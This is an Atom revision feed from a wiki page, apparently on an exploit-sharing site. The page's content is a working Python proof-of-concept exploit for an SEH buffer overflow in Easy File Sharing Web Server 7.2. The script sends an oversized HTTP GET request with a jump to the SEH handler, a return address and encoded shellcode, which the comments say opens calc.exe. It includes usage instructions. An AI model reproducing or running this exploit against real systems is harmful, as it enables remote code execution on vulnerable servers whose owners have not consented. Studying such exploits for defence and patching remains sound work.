<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Easy_File_Sharing_Web_Server_7.2_GET_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%EF%BC%88SEH%EF%BC%89</id>
	<title>Easy File Sharing Web Server 7.2 GET 緩衝區溢出漏洞（SEH） - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Easy_File_Sharing_Web_Server_7.2_GET_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%EF%BC%88SEH%EF%BC%89"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Easy_File_Sharing_Web_Server_7.2_GET_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%EF%BC%88SEH%EF%BC%89&amp;action=history"/>
	<updated>2026-04-07T08:11:52Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Easy_File_Sharing_Web_Server_7.2_GET_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%EF%BC%88SEH%EF%BC%89&amp;diff=1767&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; # Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow # Tested on: XP SP3 EN # category: Remote Exploit # Usage: ./exploit.py...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Easy_File_Sharing_Web_Server_7.2_GET_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%EF%BC%88SEH%EF%BC%89&amp;diff=1767&amp;oldid=prev"/>
		<updated>2021-04-20T05:55:25Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; # Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow # Tested on: XP SP3 EN # category: Remote Exploit # Usage: ./exploit.py...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow&lt;br /&gt;
# Tested on: XP SP3 EN&lt;br /&gt;
# category: Remote Exploit&lt;br /&gt;
# Usage: ./exploit.py ip port&lt;br /&gt;
&lt;br /&gt;
import socket&lt;br /&gt;
import sys&lt;br /&gt;
&lt;br /&gt;
host = str(sys.argv[1])&lt;br /&gt;
port = int(sys.argv[2])&lt;br /&gt;
&lt;br /&gt;
a = socket.socket()&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;Connecting to: &amp;quot; + host + &amp;quot;:&amp;quot; + str(port)&lt;br /&gt;
a.connect((host,port))&lt;br /&gt;
&lt;br /&gt;
entire=4500&lt;br /&gt;
&lt;br /&gt;
# Junk&lt;br /&gt;
buff = &amp;quot;A&amp;quot;*4061&lt;br /&gt;
&lt;br /&gt;
# Next SEH&lt;br /&gt;
buff+= &amp;quot;\xeb\x0A\x90\x90&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# pop pop ret&lt;br /&gt;
buff+= &amp;quot;\x98\x97\x01\x10&amp;quot;&lt;br /&gt;
&lt;br /&gt;
buff+= &amp;quot;\x90&amp;quot;*19&lt;br /&gt;
&lt;br /&gt;
# calc.exe&lt;br /&gt;
# Bad Characters: \x20 \x2f \x5c&lt;br /&gt;
shellcode = (&lt;br /&gt;
&amp;quot;\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9&amp;quot;&lt;br /&gt;
&amp;quot;\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56&amp;quot;&lt;br /&gt;
&amp;quot;\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9&amp;quot;&lt;br /&gt;
&amp;quot;\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97&amp;quot;&lt;br /&gt;
&amp;quot;\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64&amp;quot;&lt;br /&gt;
&amp;quot;\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8&amp;quot;&lt;br /&gt;
&amp;quot;\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a&amp;quot;&lt;br /&gt;
&amp;quot;\x1c\x39\xbd&amp;quot;&lt;br /&gt;
)&lt;br /&gt;
buff+= shellcode&lt;br /&gt;
&lt;br /&gt;
buff+= &amp;quot;\x90&amp;quot;*7&lt;br /&gt;
&lt;br /&gt;
buff+= &amp;quot;A&amp;quot;*(4500-4061-4-4-20-len(shellcode)-20)&lt;br /&gt;
&lt;br /&gt;
# GET&lt;br /&gt;
a.send(&amp;quot;GET &amp;quot; + buff + &amp;quot; HTTP/1.0\r\n\r\n&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
a.close()&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;Done...&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>